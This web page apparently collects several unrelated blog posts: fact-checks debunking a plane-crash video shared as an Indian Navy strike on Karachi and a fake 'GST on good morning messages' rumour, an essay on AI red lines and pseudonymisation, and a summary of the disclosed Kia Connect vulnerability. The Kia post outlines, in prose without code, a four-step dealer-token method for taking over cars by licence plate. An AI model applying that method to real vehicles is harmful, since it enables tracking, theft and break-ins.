#FactCheck - Philadelphia Plane Crash Video Falsely Shared as INS Vikrant Attack on Karachi Port
Executive Summary:
A video currently circulating on social media falsely claims to show the aftermath of an Indian Navy attack on Karachi Port, allegedly involving the INS Vikrant. Upon verification, it has been confirmed that the video is unrelated to any naval activity and in fact depicts a plane crash that occurred in Philadelphia, USA. This misrepresentation underscores the importance of verifying information through credible sources before drawing conclusions or sharing content.
Claim:
Social media accounts shared a video claiming that the Indian Navy’s aircraft carrier, INS Vikrant, attacked Karachi Port amid rising India-Pakistan tensions. Captions such as “INDIAN NAVY HAS DESTROYED KARACHI PORT” accompanied the footage, which shows a crash site with debris and small fires.

Fact Check:
After reverse image search we found that the viral video to earlier uploads on Facebook and X (formerly Twitter) dated February 2, 2025. The footage is from a plane crash in Philadelphia, USA, involving a Mexican-registered Learjet 55 (tail number XA-UCI) that crashed near Roosevelt Mall.

Major American news outlets, including ABC7, reported the incident on February 1, 2025. According to NBC10 Philadelphia, the crash resulted in the deaths of seven individuals, including one child.

Conclusion:
The viral video claiming to show an Indian Navy strike on Karachi Port involving INS Vikrant is entirely misleading. The footage is from a civilian plane crash that occurred in Philadelphia, USA, and has no connection to any military activity or recent developments involving the Indian Navy. Verified news reports confirm the incident involved a Mexican-registered Learjet and resulted in civilian casualties. This case highlights the ongoing issue of misinformation on social media and emphasizes the need to rely on credible sources and verified facts before accepting or sharing sensitive content, especially on matters of national security or international relations.
- Claim: INS Vikrant, attacked Karachi Port amid rising India-Pakistan tensions
- Claimed On: Social Media
- Fact Check: False and Misleading
Related Blogs

Overview:
‘Kia Connect’ is the application that is used to connect ‘Kia’ cars which allows the user control various parameters of the vehicle through the application on his/her smartphone. The vulnerabilities found in most Kias built after 2013 with but little exception. Most of the risks are derived from a flawed API that deals with dealer relations and vehicle coordination.
Technical Breakdown of Exploitation:
- API Exploitation: The attack uses the vulnerabilities in Kia’s dealership network. The researchers also noticed that, for example, the logs generated while impersonating a dealer and registering on the Kia dealer portal would be sufficient for deriving access tokens needed for next steps.
- Accessing Vehicle Information: The license plate number allowed the attackers to get the Vehicle Identification Number (VIN) number of their preferred car. This VIN can then be used to look up more information about the car and is an essential number to determine for the shared car.
- Information Retrieval: Having the VIN number in hand, attackers can launch a number of requests to backends to pull more sensitive information about the car owner, including:
- Name
- Email address
- Phone number
- Geographical address
- Modifying Account Access: With this information, attackers could change the accounts settings to make them a second user on the car, thus being hidden from the actual owner of the account.
- Executing Remote Commands: Once again, it was discovered that attackers could remotely execute different commands on the vehicle, which includes:some text
- Unlocking doors
- Starting the engine
- Monitoring the location of the vehicle in terms of position.
- Honking the horn
Technical Execution:
The researchers demonstrated that an attacker could execute a series of four requests to gain control over a Kia vehicle:
- Generate Dealer Token: The attacker sends an HTTP request in order to create a dealer token.
- Retrieve Owner Information: As indicated using the generated token, they make another request to another endpoint that returns the owner’s email address and phone number.
- Modify Access Permissions: The attacker takes advantage of the leaked information (email address and VIN) of the owner to change between users accounts and make himself the second user.
- Execute Commands: As the last one, they can send commands to perform actions on the operated vehicle.
Security Response and Precautionary Measures for Vehicle Owners
- Regular Software Updates: Car owners must make sure their cars receive updates on the recent software updates provided by auto producers.
- Use Strong Passwords: The owners of Kia Connect accounts should develop specific and complex passwords for their accounts and then update them periodically. They should avoid using numbers like the birth dates, vehicle numbers and simple passwords.
- Enable Multi-Factor Authentication: For security, vehicle owners should turn on the use of the secondary authentication when it is available to protect against unauthorized access to an account.
- Limit Personal Information Sharing: Owners of vehicles should be careful with the details that are connected with the account on their car, like the e-mail or telephone number, sharing them on social networks, for example.
- Monitor Account Activity: It is also important to monitor the account activity because of change or access attempts that are unauthorized. In case of any abnormality or anything suspicious felt while using the car, report it to Kia customer support.
- Educate Yourself on Vehicle Security: Being aware of cyber threats that are connected to vehicles and learning about how to safeguard a vehicle from such threats.
- Consider Disabling Remote Features When Not Needed: If remote features are not needed, then it is better to turn them off, and then turn them on again when needed. This can prove to help diminish the attack vector for would-be hackers.
Industry Implications:
The findings from this research underscore broader issues within automotive cybersecurity:
- Web Security Gaps: Most car manufacturers pay more attention to equipment running in automobiles instead of the safety of the websites that the car uses to operate thereby exposing automobiles that are connected very much to risks.
- Continued Risks: Vehicles become increasingly connected to internet technologies. Auto makers will have to carry cyber security measures in their cars in the future.
Conclusion:
The weaknesses found in Kia’s connected car system are a key concern for Automotive security. Since cars need web connections for core services, suppliers also face the problem of risks and need to create effective safeguards. Kia took immediate actions to tighten the safety after disclosure; however, new threats will emerge as this is a dynamic domain involving connected technology. With growing awareness of these risks, it is now important for car makers not only to put in proper security measures but also to maintain customer communication on how it safeguards their information and cars against cyber dangers. That being an incredibly rapid approach to advancements in automotive technology, the key to its safety is in our capacity to shield it from ever-present cyber threats.
Reference:
- https://timesofindia.indiatimes.com/auto/cars/hackers-could-unlock-your-kia-car-with-just-a-license-plate-is-yours-safe/articleshow/113837543.cms
- https://www.thedrive.com/news/hackers-found-millions-of-kias-could-be-tracked-controlled-with-just-a-plate-number
- https://www.securityweek.com/millions-of-kia-cars-were-vulnerable-to-remote-hacking-researchers/
- https://news24online.com/auto/kia-vehicles-hack-connected-car-cybersecurity-threat/346248/
- https://www.malwarebytes.com/blog/news/2024/09/millions-of-kia-vehicles-were-vulnerable-to-remote-attacks-with-just-a-license-plate-number
- https://informationsecuritybuzz.com/kia-vulnerability-enables-remote-acces/
- https://samcurry.net/hacking-kia

Executive Summary
A recent viral message on social media such as X and Facebook, claims that the Indian Government will start charging an 18% GST on "good morning" texts from April 1, 2024. This news is misinformation. The message includes a newspaper clipping and a video that was actually part of a fake news report from 2018. The newspaper article from Navbharat Times, published on March 2, 2018, was clearly intended as a joke. In addition to this, we also found a video of ABP News, originally aired on March 20, 2018, was part of a fact-checking segment that debunked the rumor of a GST on greetings.

Claims:
The claim circulating online suggests that the Government will start applying a 18% of GST on all "Good Morning" texts sent through mobile phones from 1st of April, this year. This tax would be added to the monthly mobile bills.




Fact Check:
When we received the news, we first did some relevant keyword searches regarding the news. We found a Facebook Video by ABP News titled Viral Sach: ‘Govt to impose 18% GST on sending good morning messages on WhatsApp?’


We have watched the full video and found out that the News is 6 years old. The Research Wing of CyberPeace Foundation also found the full version of the widely shared ABP News clip on its website, dated March 20, 2018. The video showed a newspaper clipping from Navbharat Times, published on March 2, 2018, which had a humorous article with the saying "Bura na mano, Holi hain." The recent viral image is a cutout image from ABP News that dates back to the year 2018.
Hence, the recent image that is spreading widely is Fake and Misleading.
Conclusion:
The viral message claiming that the government will impose GST (Goods and Services Tax) on "Good morning" messages is completely fake. The newspaper clipping used in the message is from an old comic article published by Navbharat Times, while the clip and image from ABP News have been taken out of context to spread false information.
Claim: India will introduce a Goods and Services Tax (GST) of 18% on all "good morning" messages sent through mobile phones from April 1, 2024.
Claimed on: Facebook, X
Fact Check: Fake, made as Comic article by Navbharat Times on 2 March 2018

Introduction
In today’s digital world, data has emerged as the new currency that influences global politics, markets, and societies. Companies, governments, and tech behemoths aim to control data because it accords them influence and power. However, a fundamental challenge brought about by this increased reliance on data is how to strike a balance between privacy protection and innovation and utility.
In recognition of these dangers, more than 200 Nobel laureates, scientists, and world leaders have recently signed the Global Call for AI Red Lines. Governments are urged by this initiative to create legally binding international regulations on artificial intelligence by 2026. Its goal is to stop AI from going beyond moral and security bounds, particularly in areas like political manipulation, mass surveillance, cyberattacks, and dangers to democratic institutions.
One way to address the threat to privacy is through pseudonymization, which makes it possible to use data valuable for research and innovation by substituting personal identifiers for artificial ones. Pseudonymization thus directly advances the AI Red Lines initiative's mission of facilitating technological advancement while lowering the risks of data misuse and privacy violations.
The Red Lines of AI: Why do they matter?
The Global Call for AI Red Lines initiative represents a collective attempt to impose precaution before catastrophe, which was done with the objective of recognising the Red Lines in the use of AI tools. Thus, anything that unites the risks of using AI is due to the absence of global safeguards. Some of these Red Lines can be understood as;
- Cybersecurity breaches in the form of exposure of financial and personal data due to AI-driven hacking and surveillance.
- Occurrence of privacy invasions due to endless tracking.
- Generative AI can also help to create realistic fake content, undermining the trust of public discourses, leading to misinformation.
- Algorithmic amplification of polarising content can also threaten civic stability, leading to a demographic disruption.
Legal Frameworks and Regulatory Landscape
The regulations of Artificial Intelligence stand fragmented across jurisdictions, leaving significant loopholes aside. Some of the frameworks already provide partial guidance. The European Union’s Artificial Intelligence Act 2024 bans “unacceptable” AI practices, whereas the US-China Agreement also ensures that nuclear weapons remain under human, not machine-controlled. The UN General Assembly has adopted resolutions urging safe and ethical AI usage, with a binding and elusive global treaty.
On the front of data protection, the General Data Protection Regulations (GDPR) of EU offers a clear definition of Pseudonymisation under Article 4(5). It also describes a process where personal data is altered in a way that it cannot be attributed to an individual without additional information, which must be stored securely and separately. Importantly, pseudonymised data still qualifies as “personal data” under GDPR. However, India’s Digital Personal Data Protection Act (DPDP) 2023 adopts a similar stance. It does not explicitly define pseudonymisation in broad terms, such as “personal data” by including potentially reversible identifiers. According to Section 8(4) of the Act, companies are meant to adopt appropriate technical or organisational measures. International bodies and conventions like the OECD Principles on AI or the Council of Europe Convention 108+ emphasize accountability, transparency, and data minimisation. Collectively, these instruments point towards pseudonymization as a best practice, though interpretations of its scope differ.
Strategies for Corporate Implementation
For a company, pseudonymisation is not just about compliance, it is also a practical solution that offers measurable benefits. By pseudonymising data, businesses can get benefits, such as;
- Enhancing Privacy protection by masking identifiers like names or IDs by reducing the impact of data breaches.
- Preserving Data Utility, unlike having a full anonymisation, pseudonymisation also retains patterns that are essential for analytical innovation.
- Facilitating data sharing can allow organizations to collaborate with their partners and researchers while maintaining proper trust.
According to these benefits, competitive advantages get translated to clauses where customers find it more likely to trust organizations that prioritise data protection, while pseudonymisation further enables the firms to engage in cross-border collaboration without violating local data laws.
Balancing Privacy Rights and Data Utility
Balancing is a central dilemma; on one side lies the case of necessity over data utility, where companies, researchers and governments rely on large datasets to enhance the scale of AI innovation. On the other hand lies the question of the right to privacy, which is a non-negotiable principle protected under the international human rights law.
Pseudonymisation offers a practical compromise by enabling the use of sensitive data while reducing the privacy risks. Taking examples of different domains, such as healthcare, it allows the researchers to work with patient information without exposing identities, whereas in finance, it supports fraud detection without revealing the customer details.
Conclusion
The rapid rise of artificial intelligence has led to the outpacing of regulations, raising urgent questions related to safety, fairness and accountability. The global call for recognising the AI red lines is a bold step that looks in the direction of setting universal boundaries. Yet, alongside the remaining global treaties, practical safeguards are also needed. Pseudonymisation exemplifies such a safeguard, which is legally recognised under the GDPR and increasingly relevant in India’s DPDP Act. It balances the twin imperatives of privacy, protection, and data utility. For organizations, adopting pseudonymisation is not only about ensuring regulatory compliance, rather, it is also about building trust, ensuring resilience, and aligning with the broader ethical responsibilities in this digital age. As the future of AI is debatable, the guiding principles also need to be clear. By embedding techniques for preserving privacy, like pseudonymisation, into AI systems, we can take a significant step towards developing a sustainable, ethical and innovation-driven digital ecosystem.
References
https://www.techaheadcorp.com/blog/shadow-ai-the-risks-of-unregulated-ai-usage-in-enterprises/
https://planetmainframe.com/2024/11/the-risks-of-unregulated-ai-what-to-know/
https://cepr.org/voxeu/columns/dangers-unregulated-artificial-intelligence
https://www.forbes.com/sites/bernardmarr/2023/06/02/the-15-biggest-risks-of-artificial-intelligence/